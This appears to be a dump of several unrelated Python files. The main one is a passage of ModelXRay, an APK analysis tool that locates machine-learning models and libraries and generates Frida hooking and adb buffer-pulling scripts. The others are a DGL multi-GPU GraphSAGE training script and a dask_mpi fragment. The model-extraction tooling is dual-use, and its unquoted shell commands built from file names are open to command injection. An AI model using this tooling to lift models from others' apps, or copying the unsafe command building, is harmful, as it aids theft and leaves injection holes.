res_md5 = self.run_w(md5_cmd)
try:
size = res_size.split()[0]
ent = res_ent.split('\n')[1].split(',')[2]
md5 = res_md5.split()[0][:8]
except:
size = ""
ent = ""
md5 = ""
self._rh.write(ent + '\t' + size + '\t' + f + '\t' + '\n')
# write entropy report for quick reference
self._entropy_report.append(ent + '\t' + md5 + '\t'+ size + '\t' + self._pkgname + '\t' + f + '\t')
# save model files
model_files = [os.path.basename(f) for f in res]
logging.info("model files:" + ','.join(model_files))
self._model_files = model_files
def append_entropy_report(self, guess_fw):
if len(self._entropy_report) != 0:
for e in self._entropy_report:
e += '\t'.join(guess_fw)
shell_cmd = "echo %s >> %s"%(e, self._entropy_report_path)
self.run_wo(shell_cmd)
def setup_lib_symbol(self, filelists):
symdir = self._outdir + '/' + self._pkgname + '/' + 'lib_symbol_files/'
self._symdir = symdir
symfilelist = []
try:
os.stat(symdir)
except:
os.mkdir(symdir)
for f in filelists:
basename = os.path.basename(f)
symfile = symdir + basename + ".symbols"
symfilelist.append(symfile)
if not os.path.exists(symfile):
shell_command = "nm -D --defined-only %s > %s" %(f, symfile)
self.run_wo(shell_command)
return symfilelist
def setup_lib_strings(self, filelists):
strdir = self._outdir + '/' + self._pkgname + '/' + 'lib_str_files/'
self._strdir = strdir
strfilelist = []
try:
os.stat(strdir)
except:
os.mkdir(strdir)
for f in filelists:
basename = os.path.basename(f)
strfile = strdir + basename + ".str"
strfilelist.append(strfile)
if not os.path.exists(strfile):
shell_command = "strings %s > %s" %(f, strfile)
self.run_wo(shell_command)
return strfilelist
def filter_meta_inf(self, line):
if "original/META-INF" in line:
return False
else:
return True
def search_dir(self, key, path):
res_str = []
shell_cmd = "ag %s -i --silent -m2 %s" %(key, path)
match = self.run_w(shell_cmd)
if match != "":
ml = match.split('\n')
ml = [m[len(path)-1:] for m in ml]
if len(ml) > 10:
ml=ml[:6]
res_str.append("\t--WARNING ! Too many matches, show 6 lines only!--")
res_str.append("\t--SHELL_CMD! %s"%shell_cmd)
# filter our x/original/META-INF/
new_ml = filter(self.filter_meta_inf, ml)
res_str += new_ml
return res_str
def extract_filename_from_search_result(self, res):
flist = []
for line in res:
fname = line.split(':')[0].strip()
if fname.startswith('--WARNING') or fname.startswith('--SHELL_CMD'):
continue
if fname.endswith('.str'):
fname = fname[:-len('.str')]
if fname.endswith('.symbols'):
fname = fname[:-len('.symbols')]
if fname not in flist:
flist.append(fname)
return flist
def guess_ml_framework_by_magic_str(self, lib_files):
# report suspected libraries and frameworks
guess_fw = []
fw_libs = []
self._rh.write("\n\n### Suspected machine learning library files under lib/:\n")
# generate symbol files for libraries
symlist = self.setup_lib_symbol(lib_files)
self._symlist = symlist
# generate str files for libraries
strfilelist = self.setup_lib_strings(lib_files)
if (len(symlist) == 0 or len(strfilelist) == 0):
logging.warning("symlist or strfilelist is empty!")
return guess_fw
symf = symlist[0]
strf = strfilelist[0]
symfpath,symftail = os.path.split(symf)
strfpath,strftail = os.path.split(strf)
# get framework list from config
frameworklist = self._config.get("config","framework").split(',')
logging.debug("framework list:" + (','.join(frameworklist)))
# do keywords matching for each framework
for fw in frameworklist:
flag = False
libs = []
self._rh.write("\n\n\t* symbol matching for framework [%s]:\n" % fw)
# get keywords for each framework
magic_str_list = self._config.get(fw.strip(),"magic_str").split(',')
magic_str_list = [x.strip() for x in magic_str_list]
logging.debug("magic str list:" + (','.join(magic_str_list)))
for m in magic_str_list:
res1 = self.search_dir(m, symfpath)
res2 = self.search_dir(m, strfpath)
res = res1 + res2
if len(res) != 0:
self._rh.write("\n\t- magic word %s:\n\n"%m)
self._rh.write('\t' + '\n\t'.join(res))
# set flag
flag = True
libs += self.extract_filename_from_search_result(res)
if flag:
libs = list(set(libs))
fw += ':'+','.join(libs)
guess_fw.append(fw)
self._rh.write("\n\n### Guess Machine Learning Framework:\n")
self._rh.write('\n'.join(guess_fw))
self._rh.write('\n\n')
if len(guess_fw) == 0:
logging.info("Probably not a machine learning app, for no framework keywords matched!")
else:
logging.info("Might be a machine learning app, for framework keywords matched!")
self._is_ml_app = True
self._guess_fw = guess_fw
return guess_fw
def lib_str_match(self, lib_files): # TODO: Not Used For Now
# report suspected libraries base whether model file show up in library strings
self._rh.write("\n\n### Suspected for model files show up library strings under lib/:\n")
# generate str files for libraries
strfilelist = self.setup_lib_strings(lib_files)
if len(strfilelist) == 0:
logging.warning("strfilelist is empty! skipping lib str match analysis!")
return
for mf in self._model_files:
self._rh.write("\"%s\":\n" % mf)
sf = strfilelist[0]
head,tail = os.path.split(sf)
self.search_dir(mf, head)
pass
def general_str_match(self):
# report files that contains model file, do grep over decomposed dir
self._rh.write("\n\n### General scan over decomposed dir for model files\n")
for mf in self._model_files:
res = self.search_dir(mf, self._decpath)
if len(res) != 0:
self._rh.write("\n\n\t===\"%s\"===:\n" % mf)
self._rh.write('\n'.join(res))
pass
def lib_analysis(self):
"""
extract interesting library files
1. if library file name has ml lib keywords, dump report it
2. if library file name don't have ml lib keywords, however, library symbols has, report it.
3. for reported lib,
"""
# get all the filename under lib/
if self._args.decomposed_package is False:
decpath = os.path.abspath(self._decdir+self._pkgname)
else:
decpath = self._decpath
lib_path = decpath + '/' + 'lib'
lib_files = self.ls_dir(lib_path)
# get relative path
relpath = [os.path.relpath(path, lib_path) for path in lib_files]
res_kw = self.keywords_analyzer(relpath, "lib_pattern")
# report suspected libraries
self._rh.write("\n\n### Suspected library files by name-matching under lib/:\n")
self._rh.write('\n'.join(res_kw) + '\n')
# do lib symbol analysis
guess_fw = self.guess_ml_framework_by_magic_str(lib_files)
# generate entropy report after get framework info
self.append_entropy_report(guess_fw)
pass
def check_magic_function(self, func_name):
"""
check whether function name matches any predefined magic_str in config:function_pattern
"""
# get function pattern
magic_str_list = self._magic_func_list
func_name_lower = func_name.lower()
for ms in magic_str_list:
if func_name_lower.find(ms.strip()) != -1:
return True
return False
def check_free_function(self, func_name):
free_str_list = self._free_func_list
free_filter_list = self._free_filter_list
fn = func_name.lower()
for fr in free_str_list:
if fn.find(fr.strip()) != -1: # found it
for ft in free_filter_list: # check filter list
if fn.find(ft.strip()) != -1:
return False # filter out
else:
continue
return True
else:
continue
return False
def generate_instrumentation_script(self, json_path, script_name):
# add frida cmd
app_name = self.get_package_name()
script_path = self._respath + '/' + script_name
js_script_path = script_path + '.js'
script_top = self._config.get("script", "top")
script_bottom = self._config.get("script", "bottom")
# shell script template
shell_tml_top = self._config.get("script", "shell_top")
shell_tml_mid = self._config.get("script", "shell_mid")
# generating javascript from template
shell_cmd = "cat %s > %s" % (script_top, js_script_path)
self.run_wo(shell_cmd)
shell_cmd = "cat %s >> %s" % (json_path, js_script_path)
self.run_wo(shell_cmd)
# insert appname
shell_cmd = "echo ';\nvar appname=\"%s\" ' >> %s" % (app_name, js_script_path)
self.run_wo(shell_cmd)
shell_cmd = "cat %s >> %s" % (script_bottom, js_script_path)
self.run_wo(shell_cmd)
# as a bonus, generate shell script
shell_script_path = script_path + '.sh'
# copy shell template top
shell_cmd = "cat %s > %s" % (shell_tml_top, shell_script_path)
self.run_wo(shell_cmd)
# add workingpath
shell_cmd = "echo 'WorkingPath=/sdcard/mallocbuffer/%s' >> %s" % (app_name, shell_script_path)
self.run_wo(shell_cmd)
# add shell template mid
shell_cmd = "cat %s >> %s" % (shell_tml_mid, shell_script_path)
self.run_wo(shell_cmd)
# add frida cmd
shell_cmd = "echo 'frida -U -f %s -l %s --no-pause' >> %s" % (app_name, script_name+'.js',shell_script_path)
self.run_wo(shell_cmd)
pass
def get_lib_free_functions(self, lib):
symdir = self._symdir
libsympath = symdir + lib + ".symbols"
free_functions = []
try:
logging.debug("libsympath:"+libsympath)
lines = open(libsympath, 'r').readlines()
for line in lines:
fields = line.split()
# add free function
if self.check_free_function(fields[2]) is True:
free_functions.append(fields[2])
except IOError as e:
print "I/O error({0}): {1}".format(e.errno, e.strerror)
except:
logging.error("error in generating lib free json files")
print "Unexpected error:", sys.exc_info()[0]
#raise
return free_functions
def generate_instrument_free_json(self):
"""
our goal is to find all ml libraries, and their dependency libs
for both the dependency libs and themselves, we instrument free
functions
depdic = {mllib1: [mllib1, a, b], mllib2: [mllib2, c, d]}
"""
# first, get dependency analysis for all libraries
all_libs = []
symlist = self._symlist
for symf in symlist:
symfpath,symftail = os.path.split(symf)
lib = symftail[:-8] # extract liba.so from liba.so.symbols
all_libs.append(lib)
logging.debug("all libs:")
logging.debug(all_libs)
all_libs_depdic = self.analyze_lib_dependency(all_libs)
# second, fetch all the machine learning libraries
ml_libs = self._libdepdic.keys()
## third, combine all_libs_depdic and ml_libs, get our free_depdic
#free_depdic = {}
#for lib in ml_libs:
# if lib in all_libs_depdic:
# free_depdic[lib] = all_libs_depdic[lib]
# if lib not in all_libs_depdic[lib]:
# free_depdic[lib].append(lib)
free_depdic = all_libs_depdic
# get dictionary for instrumenting free functions
libfreedic = {}
for lib in free_depdic:
deplibs = free_depdic[lib]
# extract raw libname, libocr.so --> ocr
rawlib = lib[3:-3]
if len(deplibs) == 1 and deplibs[0] == lib: # no external dependency
res = self.get_lib_free_functions(lib)
if res != None:
libfreedic[rawlib] = res
else:
logging.info(" can't generate json for lib:" + lib)
libfreedic.pop(lib)
elif len(deplibs) > 1:
# deplibs are more than one lib
freedic = {}
for deplib in deplibs:
rawdeplib = deplib[3:-3]
res = self.get_lib_free_functions(deplib)
if res != None:
freedic[rawdeplib] = res
else:
logging.info(" can't generate json for lib:" + deplib)
# skip this library, not every lib has free functions
if len(freedic) >= 1:
libfreedic[rawlib] = freedic
else:
logging.error("unexpeced lib dependencies, lib:"+lib)
logging.error(deplibs)
return libfreedic
def generate_lib_json(self, lib, fws):
symdir = self._symdir
libsympath = symdir + lib + ".symbols"
magic_json_list = []
match_all_list = []
match_fw_list = []
res = None
try:
logging.debug("libsympath:"+libsympath)
lines = open(libsympath, 'r').readlines()
for line in lines:
fields = line.split()
# selecting symbols for function definition
if (len(fields) >= 3) and fields[1] == 'T':
match_all_list.append(fields[2])
if self.check_magic_function(fields[2]) is True:
magic_json_list.append(fields[2])
# if function name contains framework name, add it
for fw in fws:
if fields[2].lower().find(fw) != -1:
match_fw_list.append(fields[2])
# matched, break current for loop
break
# truncate function list to avoid overflowing info
if len(magic_json_list) > self._max_func_num:
magic_json_list = magic_json_list[:self._max_func_num]
if len(match_all_list) > self._max_func_num:
match_all_list = match_all_list[:self._max_func_num]
if len(match_fw_list) > self._max_func_num:
match_fw_list = match_fw_list[:self._max_func_num]
res = (magic_json_list, match_all_list, match_fw_list)
except IOError as e:
print "I/O error({0}): {1}".format(e.errno, e.strerror)
except:
logging.error("error in generating lib json files")
print "Unexpected error:", sys.exc_info()[0]
#raise
return res
def generate_libdepdic_json(self, fws):
"""
given a list of library names and a list of framework names
generate corresponding instrumentation json file.
"""
# get lib_sym_dir
libmagicdic = {}
liballdic = {}
libfwdic = {}
for lib in self._libdepdic:
deplibs = self._libdepdic[lib]
# extract raw libname, libocr.so --> ocr
rawlib = lib[3:-3]
if len(deplibs) == 1 and deplibs[0] == lib: # no external dependency
res = self.generate_lib_json(lib, fws)
if res != None:
libmagicdic[rawlib] = res[0]
liballdic[rawlib] = res[1]
libfwdic[rawlib] = res[2]
else:
logging.info(" can't generate json for lib:" + lib)
# skip this library, not every lib has free functions
elif len(deplibs) == 1 and deplibs[0] != lib:
# deplib is not lib, which means lib is not ml lib, only need to instrument deplib
# when detect system is loading lib
rawdeplib = deplibs[0][3:-3]
res = self.generate_lib_json(deplibs[0], fws)
if res != None:
libmagicdic[rawlib] = {rawdeplib:res[0]}
liballdic[rawlib] = {rawdeplib:res[1]}
libfwdic[rawlib] = {rawdeplib:res[2]}
else:
logging.info(" can't generate json for lib:" + deplibs[0])
# skip this library, not every lib has free functions
elif len(deplibs) > 1:
# deplibs are more than one lib
mdic = {}
adic = {}
fdic = {}
for deplib in deplibs:
rawdeplib = deplib[3:-3]
res = self.generate_lib_json(deplib, fws)
if res != None:
mdic[rawdeplib] = res[0]
adic[rawdeplib] = res[1]
fdic[rawdeplib] = res[2]
else:
logging.info(" can't generate json for lib:" + deplib)
libmagicdic[rawlib] = mdic
liballdic[rawlib] = adic
libfwdic[rawlib] = fdic
# for free instrumentation, it applies to all libraries
libfreedic = self.generate_instrument_free_json()
# write results to json file
logging.debug("json dumping ... libs: " + ','.join(self._libs) + " fw:" + ','.join(fws))
magic_json_path = self._respath + '/libdicmagic.json';
all_json_path = self._respath + '/libdicall.json';
fw_json_path = self._respath + '/libdicfw.json';
free_json_path = self._respath + '/libdicfree.json';
with open(magic_json_path, 'w') as outfile:
json.dump(libmagicdic, outfile)
with open(all_json_path, 'w') as outfile:
json.dump(liballdic, outfile)
with open(fw_json_path, 'w') as outfile:
json.dump(libfwdic, outfile)
with open(free_json_path, 'w') as outfile:
json.dump(libfreedic, outfile)
# generate the script with json file
self.generate_instrumentation_script(magic_json_path, "intercept_magic_func")
self.generate_instrumentation_script(all_json_path, "intercept_all_func")
self.generate_instrumentation_script(fw_json_path, "intercept_fw_func")
self.generate_instrumentation_script(free_json_path, "intercept_free_func")
pass
def analyze_lib_dependency(self, libs):
"""
analyze library's dependency relationship,
if a dep/ b, b will load a.
don't assump cascaded dependency like
a dep/ b, b dep/ c
"""
libdepdic = {x:[x] for x in libs}
for lib in libs:
shell_cmd = "ag %s -l %s" % (lib, self._strdir)
res = self.run_w(shell_cmd).strip()
deps = res.split('\n')
if len(deps) > 0:
for dep in deps:
base = os.path.basename(dep)[:-4]
# generate dependency dictionary
if base != lib: # non-self dependency, base will load lib, base
if base in libdepdic:
libdepdic[base].append(lib)
else:
libdepdic[base] = [lib]
if lib in libdepdic:
libdepdic.pop(lib) # lib will be loaded by base
logging.debug("libdepdic:")
logging.debug(libdepdic)
return libdepdic
def generate_lib_dependency_report(self, libs):
self._rh.write("\n\n### Machine Learning Library Dependency/:\n")
# deduplicate libs
libs = list(set().union(libs))
self._libdepdic = self.analyze_lib_dependency(libs)
self._libs = libs
for lib in self._libdepdic:
deps = self._libdepdic[lib]
self._rh.write("\n[%s]:\n" % (lib))
self._rh.write("\t%s\n" % (lib)) # self dependency
for dep in deps:
self._rh.write("\t%s\n" % (dep))
self._rh.write("\n")
pass
def generate_script(self):
if self._is_ml_app is False or len(self._guess_fw) == 0:
return # don't generate script for no ml library found
# get framework shared library
libs = []
fws = []
for fw in self._guess_fw:
fields = fw.split(':')
fw_name = fields[0]
fw_libs = fields[1].split(',')
libs += fw_libs
fws.append(fw_name)
self.generate_lib_dependency_report(libs)
self.generate_libdepdic_json(fws)
pass
def setup_analyzer(self):
# add frida cmd
app_name = self.get_package_name()
analyzer_src_path = self._config.get("script","analyzer_path")
analyzer_list = self._config.get("script","analyzer_list").split(',')
analyzer_path = self._respath + "/model_analyzer/"
# create analyzer path
try:
os.stat(analyzer_path)
except:
os.mkdir(analyzer_path)
for a in analyzer_list:
# copy analyzer script
shell_cmd = "cp %s/%s %s" %(analyzer_src_path, a, analyzer_path)
self.run_wo(shell_cmd)
# create pull_and_analysis.sh script
pullbigbuffer_path = analyzer_path + 'pull_and_analysis.sh'
shell_cmd = "echo '#!/bin/sh' > %s" %(pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo 'rm pb.result' >> %s" %(pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo 'adb pull /sdcard/mallocbuffer/%s' >> %s" %(app_name, pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo './header.sh %s pb' >> %s" %(app_name, pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo 'ag conv pb.result' >> %s" %(pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo 'ag TFL pb.result' >> %s" %(pullbigbuffer_path)
self.run_wo(shell_cmd)
pass
def copy_report(self):
if len(self._models) == 0 and self._is_ml_app is False:
return # don't copy for not model found
link = self._preports + '/' + self._pkgname + '.report'
target = os.path.abspath(self._report)
logging.info("target path:" + target)
shell_cmd = "ln -sf %s %s" %(target, link)
if os.path.exists(link) is True:
if self._skip is True:
return# don't copy
self.run_wo(shell_cmd)
pass
def copy_models(self):
for m in self._models:
target = os.path.abspath(self._passets + '/' + m)
link = self._pmodels + '/' + self._pkgname +'_'+ os.path.basename(m)
shell_cmd = "ln -sf %s %s" %(target, link)
if os.path.exists(link) is True:
return# don't copy
self.run_wo(shell_cmd)
pass
def test(self):
logging.debug(" Run Test!")
time.sleep(1)
def analyze(self):
if self._skip is True:
logging.warning("skipping analysis for report.md is there! see: %s" % self._report)
return
if self._args.decomposed_package is False:
self.decompose(self._pkgname)
self.extract_model_path()
self.lib_analysis()
# generate java script that is needed by dynamic instrumentation
if self._args.json_script is True:
self.generate_script()
self.setup_analyzer()
if self._args.fast_run is not True:
self.general_str_match()
self._rh.close()
# copy report to reports dir if not exists
self.copy_report()
# copy models to models dir if not exists
self.copy_models()
# Test whether a machine learning app, if not, we might rm decomposed app
if self._is_ml_app is False and len(self._models) == 0:
if self._args.space_efficient is True:
self.remove_decomposed_files()
pass
def worker(jobs, args, config, ns):
# only do jobs that jobid % wid == 0
logging.debug("new worker created!")
length = len(jobs)
for i in xrange(length):
logging.info('modelxray is analyzeing file ' + jobs[i])
model_profiler = ModelXRay(jobs[i], config, args)
if args.test_only is True:
model_profiler.test()
else:
model_profiler.analyze()
# update progress bar
ns.value = ns.value + 1
global bar
#bar.update(progress)
bar.update(ns.value)
# test whether it's a decomposed directory
def is_decomposed_dir(path):
dirs = os.listdir(path)
if "AndroidManifest.xml" in dirs:
return True
else:
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='modelxray')
parser.add_argument('apkpath',
help = 'path to apk file or directory')
parser.add_argument('-c', '--config-file', default = 'modelxray.config',
help = 'the path of %(prog)s config file')
parser.add_argument('-r', '--regenerate-report', action='store_true',
help = 'regenerate report even if report is there')
parser.add_argument('-l', '--log-file', action='store_true',
help = 'store log in modelxray.log(default to stdout)')
parser.add_argument('-v', '--verbose', action='store_true',
help = 'verbose logging info')
parser.add_argument('-f', '--fast-run', action='store_true',
help = 'run fast by only analyzing library and assets, not smali code')
parser.add_argument('-s', '--space-efficient', action='store_true',
help = 'save space by not storing non-machine learning decomposed apps')
parser.add_argument('-t', '--test-only', action='store_true',
help = 'donot do anything, just test work splitting for multiprocessing')
parser.add_argument('-j', '--json-script', action='store_true',
help = 'automatically generate json for dynamic instrumentation java script')
parser.add_argument('-p', '--package-name', action='store_true',
help = 'use package name as output directory name, default use apk path name')
parser.add_argument('-d', '--decomposed-package', action='store_true',
help = 'start analysis from already decomposed packages')
args = parser.parse_args()
if args.log_file is True:
if args.verbose is True:
logging.basicConfig(filename='modelxray.log', level=logging.DEBUG)
else:
logging.basicConfig(filename='modelxray.log', level=logging.INFO)
else:
if args.verbose is True:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
config = ConfigParser.RawConfigParser()
if (os.path.exists(args.config_file)):
config.read(args.config_file)
else:
logging.error("config file not exists")
exit(1)
jobs = []
if os.path.isfile(args.apkpath):
logging.info('modelxray is analyzeing file ' + args.apkpath)
model_profiler = ModelXRay(args.apkpath, config, args)
model_profiler.analyze()
elif os.path.isdir(args.apkpath):
logging.info('modelxray is analyzeing dir ' + args.apkpath)
if args.decomposed_package is True:
if is_decomposed_dir(args.apkpath):
# Single decomposed dir
model_profiler = ModelXRay(args.apkpath, config, args)
model_profiler.analyze()
else:
dirs = os.listdir(args.apkpath)
for d in dirs:
dp = args.apkpath + '/' + d
# skip unrevelant dirs
if is_decomposed_dir(dp):
jobs.append(dp)
else:
for subdir, dirs, files in os.walk(args.apkpath):
for file in files:
filepath = os.path.join(subdir, file)
if filepath.endswith('apk'):
jobs.append(filepath)
# get worker number
try:
ncpu = int(config.get("config","ncpu"))
logging.debug("ncpu: %d" % ncpu)
except:
ncpu = 4
with progressbar.ProgressBar(max_value=len(jobs)) as bar:
# create workers
workers = []
mgr = Manager()
ns = mgr.Namespace()
ns.value = 0
jobs_num = len(jobs)
worker_load = jobs_num / ncpu
worker_left = jobs_num % ncpu
if worker_load > 0:
for i in range(ncpu):
subjobs = jobs[i * worker_load : (i+1)*worker_load]
workers.append(Process(target = worker, args = (subjobs, args, config, ns)))
if worker_left > 0:
subjobs = jobs[ncpu*worker_load:jobs_num]
workers.append(Process(target = worker, args = (subjobs, args, config, ns)))
else:
workers.append(Process(target = worker, args = (jobs, args, config, ns)))
worker_num = len(workers)
for i in range(worker_num):
workers[i].start()
for i in range(worker_num):
workers[i].join()
pass
|
train_sampling_multi_gpu.py
|
import os
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import dgl.multiprocessing as mp
import dgl.nn.pytorch as dglnn
import time
import math
import argparse
from torch.nn.parallel import DistributedDataParallel
import tqdm
from model import SAGE
from load_graph import load_reddit, inductive_split, load_ogb
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (th.argmax(pred, dim=1) == labels).float().sum() / len(pred)
def evaluate(model, g, nfeat, labels, val_nid, device):
"""
Evaluate the model on the validation set specified by ``val_nid``.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
val_nid : A node ID tensor indicating which nodes do we actually compute the accuracy for.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
pred = model.inference(g, nfeat, device, args.batch_size, args.num_workers)
model.train()
return compute_acc(pred[val_nid], labels[val_nid])
def load_subtensor(nfeat, labels, seeds, input_nodes, dev_id):
"""
Extracts features and labels for a subset of nodes.
"""
batch_inputs = nfeat[input_nodes].to(dev_id)
batch_labels = labels[seeds].to(dev_id)
return batch_inputs, batch_labels
#### Entry point
def run(proc_id, n_gpus, args, devices, data):
# Start up distributed training, if enabled.
device = th.device(devices[proc_id])
if n_gpus > 0:
th.cuda.set_device(device)
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
# Unpack data
n_classes, train_g, val_g, test_g, train_nfeat, val_nfeat, test_nfeat, \
train_labels, val_labels, test_labels, train_nid, val_nid, test_nid = data
if args.data_device == 'gpu':
train_nfeat = train_nfeat.to(device)
train_labels = train_labels.to(device)
elif args.data_device == 'uva':
train_nfeat = dgl.contrib.UnifiedTensor(train_nfeat, device=device)
train_labels = dgl.contrib.UnifiedTensor(train_labels, device=device)
in_feats = train_nfeat.shape[1]
if args.graph_device == 'gpu':
train_nid = train_nid.to(device)
train_g = train_g.formats(['csc'])
train_g = train_g.to(device)
args.num_workers = 0
elif args.graph_device == 'uva':
train_nid = train_nid.to(device)
train_g.pin_memory_()
args.num_workers = 0
# Create PyTorch DataLoader for constructing blocks
sampler = dgl.dataloading.MultiLayerNeighborSampler(
[int(fanout) for fanout in args.fan_out.split(',')])
dataloader = dgl.dataloading.NodeDataLoader(
train_g,
train_nid,
sampler,
use_ddp=n_gpus > 1,
device=device,
batch_size=args.batch_size,
shuffle=True,
drop_last=False,
num_workers=args.num_workers)
# Define model and optimizer
model = SAGE(in_feats, args.num_hidden, n_classes, args.num_layers, F.relu, args.dropout)
model = model.to(device)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[device], output_device=device)
loss_fcn = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Training loop
avg = 0
iter_tput = []
for epoch in range(args.num_epochs):
tic = time.time()
# Loop over the dataloader to sample the computation dependency graph as a list of
# blocks.
for step, (input_nodes, seeds, blocks) in enumerate(dataloader):
if proc_id == 0:
tic_step = time.time()
# Load the input features as well as output labels
batch_inputs, batch_labels = load_subtensor(train_nfeat, train_labels,
seeds, input_nodes, device)
blocks = [block.int().to(device) for block in blocks]
# Compute loss and prediction
batch_pred = model(blocks, batch_inputs)
loss = loss_fcn(batch_pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if proc_id == 0:
iter_tput.append(len(seeds) * n_gpus / (time.time() - tic_step))
if step % args.log_every == 0 and proc_id == 0:
acc = compute_acc(batch_pred, batch_labels)
print('Epoch {:05d} | Step {:05d} | Loss {:.4f} | Train Acc {:.4f} | Speed (samples/sec) {:.4f} | GPU {:.1f} MB'.format(
epoch, step, loss.item(), acc.item(), np.mean(iter_tput[3:]), th.cuda.max_memory_allocated() / 1000000))
if n_gpus > 1:
th.distributed.barrier()
toc = time.time()
if proc_id == 0:
print('Epoch Time(s): {:.4f}'.format(toc - tic))
if epoch >= 5:
avg += toc - tic
if epoch % args.eval_every == 0 and epoch != 0:
if n_gpus == 1:
eval_acc = evaluate(
model, val_g, val_nfeat, val_labels, val_nid, devices[0])
test_acc = evaluate(
model, test_g, test_nfeat, test_labels, test_nid, devices[0])
else:
eval_acc = evaluate(
model.module, val_g, val_nfeat, val_labels, val_nid, devices[0])
test_acc = evaluate(
model.module, test_g, test_nfeat, test_labels, test_nid, devices[0])
print('Eval Acc {:.4f}'.format(eval_acc))
print('Test Acc: {:.4f}'.format(test_acc))
if n_gpus > 1:
th.distributed.barrier()
if proc_id == 0:
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument('--gpu', type=str, default='0',
help="Comma separated list of GPU device IDs.")
argparser.add_argument('--dataset', type=str, default='reddit')
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--fan-out', type=str, default='10,25')
argparser.add_argument('--batch-size', type=int, default=1000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=5)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--dropout', type=float, default=0.5)
argparser.add_argument('--num-workers', type=int, default=0,
help="Number of sampling processes. Use 0 for no extra process.")
argparser.add_argument('--inductive', action='store_true',
help="Inductive learning setting")
argparser.add_argument('--graph-device', choices=('cpu', 'gpu', 'uva'), default='cpu',
help="Device to perform the sampling. "
"Must have 0 workers for 'gpu' and 'uva'")
argparser.add_argument('--data-device', choices=('cpu', 'gpu', 'uva'), default='gpu',
help="By default the script puts all node features and labels "
"on GPU when using it to save time for data copy. This may "
"be undesired if they cannot fit in GPU memory at once. "
"Use 'cpu' to keep the features on host memory and "
"'uva' to enable UnifiedTensor (GPU zero-copy access on "
"pinned host memory).")
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
n_gpus = len(devices)
if args.dataset == 'reddit':
g, n_classes = load_reddit()
elif args.dataset == 'ogbn-products':
g, n_classes = load_ogb('ogbn-products')
elif args.dataset == 'ogbn-papers100M':
g, n_classes = load_ogb('ogbn-papers100M')
g = dgl.add_reverse_edges(g)
# convert labels to integer
g.ndata['labels'] = th.as_tensor(g.ndata['labels'], dtype=th.int64)
g.ndata.pop('year')
else:
raise Exception('unknown dataset')
if args.inductive:
train_g, val_g, test_g = inductive_split(g)
train_nfeat = train_g.ndata.pop('features')
val_nfeat = val_g.ndata.pop('features')
test_nfeat = test_g.ndata.pop('features')
train_labels = train_g.ndata.pop('labels')
val_labels = val_g.ndata.pop('labels')
test_labels = test_g.ndata.pop('labels')
else:
train_g = val_g = test_g = g
train_nfeat = val_nfeat = test_nfeat = g.ndata.pop('features')
train_labels = val_labels = test_labels = g.ndata.pop('labels')
test_nid = test_g.ndata.pop('test_mask',
~(test_g.ndata['train_mask'] | test_g.ndata['val_mask'])).nonzero().squeeze()
train_nid = train_g.ndata.pop('train_mask').nonzero().squeeze()
val_nid = val_g.ndata.pop('val_mask').nonzero().squeeze()
# Create csr/coo/csc formats before launching training processes with multi-gpu.
# This avoids creating certain formats in each sub-process, which saves momory and CPU.
train_g.create_formats_()
val_g.create_formats_()
test_g.create_formats_()
# this to avoid competition overhead on machines with many cores.
# Change it to a proper number on your machine, especially for multi-GPU training.
os.environ['OMP_NUM_THREADS'] = str(mp.cpu_count() // 2 // n_gpus)
if n_gpus > 1:
# Copy the graph to shared memory explicitly before pinning.
# In other cases, we can just rely on fork's copy-on-write.
# TODO: the original train_g is not freed.
if args.graph_device == 'uva':
train_g = train_g.shared_memory('train_g')
if args.data_device == 'uva':
train_nfeat = train_nfeat.share_memory_()
train_labels = train_labels.share_memory_()
# Pack data
data = n_classes, train_g, val_g, test_g, train_nfeat, val_nfeat, test_nfeat, \
train_labels, val_labels, test_labels, train_nid, val_nid, test_nid
if devices[0] == -1:
assert args.graph_device == 'cpu', \
f"Must have GPUs to enable {args.graph_device} sampling."
assert args.data_device == 'cpu', \
f"Must have GPUs to enable {args.data_device} feature storage."
run(0, 0, args, ['cpu'], data)
elif n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=run, args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
|
dask_mpi.py
|
import logging
import math
import os
from threading import Thread
from distributed import Scheduler, Worker
from mpi4py import MPI
from tornado import gen
from tornado.ioloop import IOLoop
logger = logging.getLogger(__name__)
def _start_scheduler():
logger.info("Starting scheduler...")
loop = IOLoop.current()
s = Scheduler(loop=loop)
s.start("tcp://:6000") # Listen on TCP port 6000
logger.info("Scheduler started")
return s
def _create_worker(scheduler_str, ncores, memory_limit="auto"):
logger.info("Creating worker...")
loop = IOLoop.current()
return Worker(
"tcp://{}".format(scheduler_str),
loop=loop,
ncores=ncores,
memory_limit=memory_limit,
reconnect=False,
)
def _start_worker(worker):
logger.info("Starting worker...")
worker.start() # choose randomly assigned port
